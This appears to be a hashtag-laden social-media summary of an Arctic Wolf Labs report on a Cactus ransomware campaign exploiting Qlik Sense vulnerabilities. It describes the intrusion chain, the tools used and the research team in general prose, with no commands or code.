https://bit.ly/46JsW4x - 🚨 Cactus Ransomware Targets Qlik Sense: Arctic Wolf Labs reports a new Cactus ransomware campaign exploiting vulnerabilities in Qlik Sense, a cloud analytics platform. This campaign marks the first known instance of Qlik Sense being targeted for ransomware deployment. #CactusRansomware #CyberSecurity #QlikSenseExploit 🔍 Intrusion Analysis and Exploitation Details: The intrusions involve exploiting known vulnerabilities (CVE-2023-41266, CVE-2023-41265, CVE-2023-48365) in Qlik Sense for initial access. The execution chain consistently involves the Qlik Sense Scheduler service, triggering uncommon processes and downloading malicious tools. #ThreatIntelligence #VulnerabilityExploitation ⚙️ Malicious Activity and Tools Used: Attackers use PowerShell and BITS for downloading tools like ManageEngine UEMS, AnyDesk, and PuTTY Link for persistence and remote control. These tools are disguised as legitimate Qlik files and downloaded using various PowerShell commands. #MalwareTactics #CyberAttackTools 🔑 Ransomware Deployment and Lateral Movement: Following successful exploitation, Cactus ransomware is deployed. Attackers use RDP for lateral movement and tools like WizTree and rclone for disk analysis and data exfiltration. All attacks show significant overlaps, pointing to a single threat actor. #RansomwareAttack #DataExfiltration 🛡️ Indicators of Compromise (IoCs) Identified: Several IoCs, including IP addresses, domain names, and file paths, are associated with this campaign. These IoCs are crucial for organizations to detect and respond to similar threats. #CyberDefense #IoCs 🧠 Insights from Arctic Wolf Researchers: Stefan Hostetler, Markus Neis, and Kyle Pagelow from Arctic Wolf Labs contribute their expertise in threat intelligence and forensic analysis to this investigation, providing vital insights into sophisticated cyber threats. #CybersecurityExperts #ArcticWolfLabs The continuous monitoring and analysis of this campaign emphasize the importance of proactive cybersecurity measures and the need for constant vigilance in the face of evolving cyber threats.